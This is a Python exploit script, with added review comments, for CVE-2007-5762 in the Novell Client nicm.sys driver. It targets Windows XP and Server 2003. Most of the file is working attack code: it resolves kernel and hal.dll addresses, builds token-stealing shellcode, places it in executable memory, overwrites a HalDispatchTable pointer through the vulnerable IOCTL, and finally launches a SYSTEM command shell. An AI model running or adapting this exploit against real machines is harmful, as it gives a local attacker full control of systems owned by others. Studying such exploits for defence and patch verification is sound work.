# Novell Client 4.91 SP3/4 Privilege escalation exploit
# Download link: http://download.novell.com/Download?buildid=SyZ1G2ti7wU~
#
# SecurityFocus: http://www.securityfocus.com/bid/27209/info
# CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5762
# Patch: http://download.novell.com/Download?buildid=4FmI89wOmg4~
#
# Author: [email protected]
# Version Tested: Novell Client 4.91 SP4
# Targets: Exploit works on all service packs of Win2K3 and WinXP (except Windows XP SP1)
# Thanks:
# - g0tmi1k for helping me test out the exploit on as many versions of Windows as possible.
# - ryujin for the help while developing the exploit.
from ctypes import *
import sys,struct,os
from optparse import OptionParser
# Module handles for the Win32, native (NT) and PSAPI DLLs used below.
# `windll` comes from the star import of ctypes, so this only works on Windows.
kernel32, ntdll, Psapi = windll.kernel32, windll.ntdll, windll.Psapi
def GetBase(drvname=None):
    """Return the load address of a kernel-mode driver via PSAPI.

    With ``drvname`` given (a lower-case base name such as ``"hal.dll"``,
    since it is compared against the lower-cased driver name) the base
    address of that driver is returned.  Without it, the first driver whose
    base name contains ``"krnl"`` is treated as the kernel image and a
    ``(base_address, image_name)`` tuple is returned.  Returns ``None`` when
    nothing matches.
    """
    EVIL_ARRAY = 1024
    myarray = c_ulong * EVIL_ARRAY
    lpImageBase = myarray()
    # NOTE(review): cb is a size in *bytes*, but 1024 is the element count of
    # lpImageBase (4-byte c_ulong on Windows, so 4096 bytes).  Only the first
    # 256 slots can ever be filled; the rest stay zero and are skipped below.
    cb = c_int(1024)
    lpcbNeeded = c_long()
    drivername_size = c_long()
    drivername_size.value = 48
    Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
    for baseaddr in lpImageBase:
        # Fresh zero-filled 48-byte buffer for this driver's base name.
        drivername = c_char_p("\x00"*drivername_size.value)
        if baseaddr:
            Psapi.GetDeviceDriverBaseNameA(baseaddr, drivername,
                                           drivername_size.value)
            if drvname:
                # Exact, case-insensitive match on the requested driver.
                if drivername.value.lower() == drvname:
                    print "[>] Retrieving %s information." % drvname
                    print "[>] %s base address: %s" % (drvname, hex(baseaddr))
                    return baseaddr
            else:
                # No name requested: pick the first image whose name contains
                # "krnl" and report it as the kernel.
                if drivername.value.lower().find("krnl") !=-1:
                    print "[>] Retrieving Kernel information."
                    print "[>] Kernel version: ", drivername.value
                    print "[>] Kernel base address: %s" % hex(baseaddr)
                    return (baseaddr, drivername.value)
    return None
if __name__ == '__main__':
    # Proof-of-concept for CVE-2007-5762 (Novell Client nicm.sys, see header).
    # The vendor patch linked in the header removes the flaw; from a
    # defender's view the observable artefacts are a user-mode open of the
    # DEVICE name below followed by the EVIL_IOCTL control code.
    #
    # The only option is the target OS, which selects the hard-coded
    # hal.dll and process-structure offsets further down.
    usage = "%prog -o <target>"
    parser = OptionParser(usage=usage)
    parser.add_option("-o", type="string",
                      action="store", dest="target_os",
                      help="Available target operating systems: XP, 2K3")
    (options, args) = parser.parse_args()
    OS = options.target_os
    if not OS or OS.upper() not in ['XP','2K3']:
        parser.print_help()
        sys.exit()
    OS = OS.upper()
    GENERIC_READ = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    DEVICE = '\\\\.\\nicm'
    # Open the driver's device object from user mode.
    # NOTE(review): CreateFileA returns INVALID_HANDLE_VALUE (-1) on failure,
    # which is truthy, so the `if device_handler:` test below does not catch
    # a failed open.
    device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
    # Resolve HalDispatchTable: locate the export in a user-mode copy of the
    # kernel image (flag 1 = DONT_RESOLVE_DLL_REFERENCES), then rebase that
    # offset onto the real kernel load address reported by GetBase().
    (krnlbase, kernelver) = GetBase()
    hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
    HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")
    HalDispatchTable -= hKernel
    HalDispatchTable += krnlbase
    HalBase = GetBase("hal.dll")
    print "[>] HalDispatchTable address:", hex(HalDispatchTable)
    HalDispatchTable0x4 = HalDispatchTable + 0x4
    HalDispatchTable0x8 = HalDispatchTable0x4 + 0x4
    HalDispatchTable_0x14 = HalDispatchTable0x4 - 0x10  # NOTE(review): computed but never used
    # Hard-coded, build-specific offsets into hal.dll; these are what ties
    # the script to the OS versions listed in the header.
    if OS == "2K3":
        HaliQuerySystemInformation = HalBase + 0x1fa1e # Offset for 2003
        HalpSetSystemInformation = HalBase + 0x21c60 # Offset for 2003
    else:
        HaliQuerySystemInformation = HalBase + 0x16bba # Offset for XP
        HalpSetSystemInformation = HalBase + 0x19436# Offset for XP
    print "[>] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)
    print "[>] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)
    EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL
    retn = c_ulong()
    # The "input buffer" handed to the IOCTL is an address, not a buffer.
    inut_buffer = HalDispatchTable0x4 - 0x10 + 0x3 # Make the pwnsauce overwrite
    inut_size = 0x0
    output_buffer = 0x41414141 # Junk
    output_size = 0x0
    # Get offsets (per-OS structure offsets embedded into the shellcode below)
    if OS == "2K3":
        _KPROCESS = "\x38" # Offset for 2003
        _TOKEN = "\xd8" # Offset for 2003
        _UPID = "\x94" # Offset for 2003
        _APLINKS = "\x98" # Offset for 2003
    else:
        _KPROCESS = "\x44" # Offset for XP
        _TOKEN = "\xc8" # Offset for XP
        _UPID = "\x84" # Offset for XP
        _APLINKS = "\x88" # Offset for XP
    # Restore the pointer: the two HalDispatchTable slots (+4 / +8) are
    # written back with the hal.dll addresses computed above, packed as
    # little-endian DWORDs into the byte string.
    pointer_restore = "\x31\xc0" + \
                      "\xb8" + struct.pack("L", HalpSetSystemInformation) + \
                      "\xa3" + struct.pack("L", HalDispatchTable0x8) + \
                      "\xb8" + struct.pack("L", HaliQuerySystemInformation) + \
                      "\xa3" + struct.pack("L", HalDispatchTable0x4)
    # Make the evil token stealing (uses the _KPROCESS/_TOKEN/_UPID/_APLINKS
    # offsets selected above)
    steal_token = "\x52" +\
                  "\x53" +\
                  "\x33\xc0" +\
                  "\x64\x8b\x80\x24\x01\x00\x00" +\
                  "\x8b\x40" + _KPROCESS +\
                  "\x8b\xc8" +\
                  "\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
                  "\x89\x1d\x00\x09\x02\x00" +\
                  "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
                  "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
                  "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
                  "\x75\xe8" +\
                  "\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
                  "\x8b\xc1" +\
                  "\x89\x90" + _TOKEN + "\x00\x00\x00" +\
                  "\x5b" +\
                  "\x5a" +\
                  "\xc2\x10"
    # Build the shellcode: NOP sled, restore stub, token stub, NOP sled.
    sc = "\x90" * 100
    sc+= pointer_restore + steal_token
    sc+= "\x90" * 100
    # Fixed per-OS address at which the shellcode is placed in this process.
    if OS == "2K3":
        baseadd = c_int(0x02a6ba10)
    else:
        baseadd = c_int(0x026e7bb0)
    MEMRES = (0x1000 | 0x2000)   # MEM_COMMIT | MEM_RESERVE
    PAGEEXE = 0x00000040         # PAGE_EXECUTE_READWRITE
    Zero_Bits = c_int(0)
    RegionSize = c_int(0x1000)
    write = c_int(0)
    # Commit one RWX page at baseadd in the current process (-1) and copy
    # the shellcode into it.  NOTE(review): dwStatus is never checked, and
    # the WriteProcessMemory calls repeat the literal address instead of
    # reusing baseadd.value.
    dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE)
    if OS == "2K3":
        kernel32.WriteProcessMemory(-1, 0x02a6ba10, sc, 0x1000, byref(write))
    else:
        kernel32.WriteProcessMemory(-1, 0x026e7bb0, sc, 0x1000, byref(write))
    if device_handler:
        print "[>] Sending IOCTL to the driver."
        # Driver-side handling of this control code is the CVE-2007-5762
        # defect; dev_io (the BOOL result) is never inspected.
        dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None)
        evil_in = c_ulong()
        evil_out = c_ulong()
        evil_in = 0x1337   # NOTE(review): rebinds the c_ulong above to a plain int
        # Presumably this syscall is what reaches the patched dispatch-table
        # slot and runs the shellcode — confirm against HalDispatchTable0x4
        # above.  The return value (hola) is not checked.
        hola = ntdll.NtQueryIntervalProfile(evil_in, byref(evil_out))
        print "[>] Launching shell as SYSTEM."
        os.system("cmd.exe /K cd c:\\windows\\system32")